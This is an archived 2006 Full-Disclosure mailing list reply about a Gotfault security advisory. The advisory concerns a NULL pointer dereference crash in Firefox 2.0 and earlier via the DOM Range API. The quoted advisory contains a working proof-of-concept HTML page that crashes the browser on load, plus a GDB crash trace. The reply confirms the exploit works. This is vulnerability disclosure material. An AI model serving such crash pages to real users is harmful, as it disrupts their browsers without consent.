lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 30 Oct 2006 19:04:04 +0200 From: Mihai Dontu <mdontu@...defender.com> To: full-disclosure@...ts.grok.org.uk Subject: Re: Firefox <= 2.0 crash Carlos Barros wrote: > ------------------------------------------------- > Gotfault Security - Advisory #05 - 27/10/06 > ------------------------------------------------- > Software : Firefox > Homepage : http://www.mozilla.com/ > Vulnerable : 1.5.0.7 and below, 2.0 > Risk : Moderate > Impact : Denial of Services (Code execution not verified) > ------------------------------------------------- > DESCRIPTION > ------------------------------------------------- > Mozilla Firefox is prone to a D.O.S within its javascript Range object. In a > special condition, a NULL Pointer Deference occur and Firefox crashes. >>>From DOM MDC: > > "The Range object represents a fragment of a document that can contain nodes > and parts of text nodes in a given document." > > A Range object can be initialized using the selectNode method, that selects a > node to be inserted within a Range. A Range can also be used to create > document > fragments using the createContextualFragment method. Below is an example of > using such a method, from DOM MDC: > > var tagString = "<div>I am a div node</div>"; > var range = document.createRange(); > range.selectNode(document.getElementsByTagName("div").item(0)); > var documentFragment = range.createContextualFragment(tagString); > document.body.appendChild(documentFragment); > > As can be seen, a range is created using the createRange document method and > then is initialized using the selectNode method against some element within > the current document. At this point createContextualFragment can be used to > create document fragments, that can be inserted into the document. > Mozilla Firefox does not proper handle when a DOCUMENT_TYPE_NODE > (<!DOCTYPE...) > element is passed to selectNode method and trigger a NULL Pointer deference > when calling createContextualFragment method. > > ------------------------------------------------- > POC > ------------------------------------------------- > > This POC code crashes Mozilla Firefox: > > --- snip --- > > <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> > <html> > <head> > <script type="text/javascript"> > function do_crash() > { > var range; > > range = document.createRange(); > [1] range.selectNode(document.firstChild); > [2] range.createContextualFragment('<span></span>'); > } > </script> > </head> > <body onload="do_crash()"> > <p>Good bye Firefox!</p> > </body> > </html> > > --- snip --- > > ------------------------------------------------- > POC details > ------------------------------------------------- > > In [1], we use the selectNode method agains document.firstNode, that in > this case is <!DOCTYPE ...> node. Then we use createContextualFragment > and Firefox crashes. > > ------------------------------------------------- > GDB session > ------------------------------------------------- > > Following is the GDB session registered in the crash moment, tested > agains Firefox 2.0 official release: > > --- snip --- > > barros@...hod:~$ gdb /usr/lib/firefox/firefox-bin -q > (no debugging symbols found) > Using host libthread_db library "/lib/tls/libthread_db.so.1". > (gdb) at 16000 > Attaching to program: /usr/lib/firefox-2.0RC3/firefox-bin, process 16000 > ... > ... > 0xb7502ce3 in poll () from /lib/tls/libc.so.6 > (gdb) c > Continuing. > [Thread -1240372304 (LWP 16003) exited] > [Thread -1283585104 (LWP 16010) exited] > [New Thread -1283585104 (LWP 16018)] > [New Thread -1240372304 (LWP 16019)] > > Program received signal SIGSEGV, Segmentation fault. > [Switching to Thread -1221409088 (LWP 16000)] > 0x081d98ee in nsWritingIterator<unsigned short>::advance () > (gdb) i r > eax 0x0 0 > ecx 0x2cec7263 753693283 > edx 0x95b55b8 156980664 > ebx 0x1 1 > esp 0xbf89f334 0xbf89f334 > ebp 0xbf89f5b8 0xbf89f5b8 > esi 0x0 0 > edi 0x1 1 > eip 0x81d98ee 0x81d98ee > eflags 0x10246 66118 > cs 0x73 115 > ss 0x7b 123 > ds 0x7b 123 > es 0x7b 123 > fs 0x0 0 > gs 0x33 51 > (gdb) bt > #0 0x081d98ee in nsWritingIterator<unsigned short>::advance () > #1 0x083b4d8f in nsReadingIterator<unsigned short>::advance () > #2 0xb7ed339b in XPTC_InvokeByIndex () from /usr/lib/firefox/libxpcom_core.so > #3 0x080a6960 in nsTHashtable<nsBaseHashtableET<nsDepCharHashKey, > nsAutoPtr<nsINIParser::INIValue> > >::~nsTHashtable () > #4 0x080ac53a in nsTHashtable<nsBaseHashtableET<nsDepCharHashKey, > nsAutoPtr<nsINIParser::INIValue> > >::~nsTHashtable () > #5 0xb7f2fed6 in js_Invoke () from /usr/lib/firefox/libmozjs.so > #6 0xb7f3480d in js_Interpret () from /usr/lib/firefox/libmozjs.so > #7 0xb7f2ff91 in js_Invoke () from /usr/lib/firefox/libmozjs.so > #8 0xb7f30374 in js_InternalInvoke () from /usr/lib/firefox/libmozjs.so > #9 0xb7f0d854 in JS_CallFunctionValue () from /usr/lib/firefox/libmozjs.so > #10 0x0843dbb7 in nsReadingIterator<unsigned short>::advance () > #11 0x0846b6d9 in nsReadingIterator<unsigned short>::advance () > #12 0x083c9724 in nsReadingIterator<unsigned short>::advance () > #13 0x083c9b4b in nsReadingIterator<unsigned short>::advance () > #14 0x08442204 in nsReadingIterator<unsigned short>::advance () > #15 0x0826f4e7 in XmlInitUnknownEncodingNS () > #16 0x085902fa in nsXPTCVariant::Init () > #17 0x0856d6d8 in nsXPTCVariant::Init () > #18 0x0859003b in nsXPTCVariant::Init () > #19 0x08574845 in nsXPTCVariant::Init () > #20 0x08573fb7 in nsXPTCVariant::Init () > #21 0x08573f0e in nsXPTCVariant::Init () > #22 0x08573cc7 in nsXPTCVariant::Init () > #23 0x0812dc8c in nsTHashtable<nsBaseHashtableET<nsDepCharHashKey, > nsAutoPtr<nsINIParser::INIValue> > >::~nsTHashtable () > #24 0x08284255 in XmlInitUnknownEncodingNS () > #25 0x08284002 in XmlInitUnknownEncodingNS () > #26 0xb7ebe11f in PL_HandleEvent () from /usr/lib/firefox/libxpcom_core.so > #27 0xb7ebe072 in PL_ProcessPendingEvents () > from /usr/lib/firefox/libxpcom_core.so > #28 0xb7ebf69f in nsEventQueueImpl::CheckForDeactivation () > from /usr/lib/firefox/libxpcom_core.so > #29 0x0824aba4 in XmlInitUnknownEncodingNS () > #30 0xb797a53f in g_vasprintf () from /usr/lib/libglib-2.0.so.0 > #31 0xb7952b77 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0 > #32 0xb7954505 in g_main_context_acquire () from /usr/lib/libglib-2.0.so.0 > #33 0xb795482a in g_main_loop_run () from /usr/lib/libglib-2.0.so.0 > #34 0xb7c0fac3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0 > #35 0x0824ae48 in XmlInitUnknownEncodingNS () > #36 0x0869f4c4 in nsXPTCVariant::Init () > #37 0x0807d11f in ?? () > #38 0x08b43ff0 in ?? () > #39 0xb745f9b8 in ?? () from /lib/tls/libc.so.6 > #40 0x00000000 in ?? () > #41 0x00000000 in ?? () > #42 0x00000001 in ?? () > #43 0x08834520 in nsIFactory::GetIID()::iid () > #44 0xbf8a100c in ?? () > #45 0x08834520 in nsIFactory::GetIID()::iid () > #46 0xbf8a100c in ?? () > #47 0x00000000 in ?? () > #48 0x08834480 in nsIFactory::GetIID()::iid () > #49 0xbf8a1008 in ?? () > #50 0x08834480 in nsIFactory::GetIID()::iid () > #51 0xbf8a1008 in ?? () > #52 0x00000000 in ?? () > #53 0x00000000 in ?? () > #54 0x00000000 in ?? () > #55 0x00000001 in ?? () > #56 0xb7378ee0 in ?? () > #57 0x00000000 in ?? () > #58 0x00000001 in ?? () > #59 0x08a4ea30 in ?? () > #60 0x08eac128 in ?? () > #61 0xbf8a1058 in ?? () > #62 0xb7de51e7 in pthread_mutex_lock () from /lib/tls/libpthread.so.0 > #63 0x08079397 in ?? () > #64 0x00000001 in ?? () > #65 0xbf8a1384 in ?? () > #66 0x088330a0 in _IO_stdin_used () > #67 0xbf8a1358 in ?? () > #68 0xb7468fcb in __libc_start_main () from /lib/tls/libc.so.6 > #69 0xb7468fcb in __libc_start_main () from /lib/tls/libc.so.6 > #70 0x080792f5 in ?? () > (gdb) x/i $eip > 0x81d98ee <_ZN17nsWritingIteratorItE7advanceEi+75886>: mov 0x4(%eax),%edx > (gdb) i r eax edx > eax 0x0 0 > edx 0x95b55b8 156980664 > (gdb) c > Continuing. > Detaching after fork from child process 16020. > > Program received signal SIGSEGV, Segmentation fault. > 0x081d98ee in nsWritingIterator<unsigned short>::advance () > > --- snip --- > > ------------------------------------------------- > TIMELINE > ------------------------------------------------- > 06/08/2006 - Vulnerability detected. > 04/10/2006 - Vendor contacted, no response. > 27/10/2006 - Advisory released > > ------------------------------------------------- > REFERENCES > ------------------------------------------------- > http://gotfault.net/research/advisory/gadv-firefox.txt > http://www.barrossecurity.com/download/29 It works on Firefox 2.0 (Linux/Windows) (after one deletes "[1]" and "[2]" from your POC). It does not work, however, on Minefield (3.0.a1 - Linux, cvs build, x86_64). M.D. -- This message was scanned for viruses by BitDefender for Linux Mail Servers. For more information please visit http://www.bitdefender.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists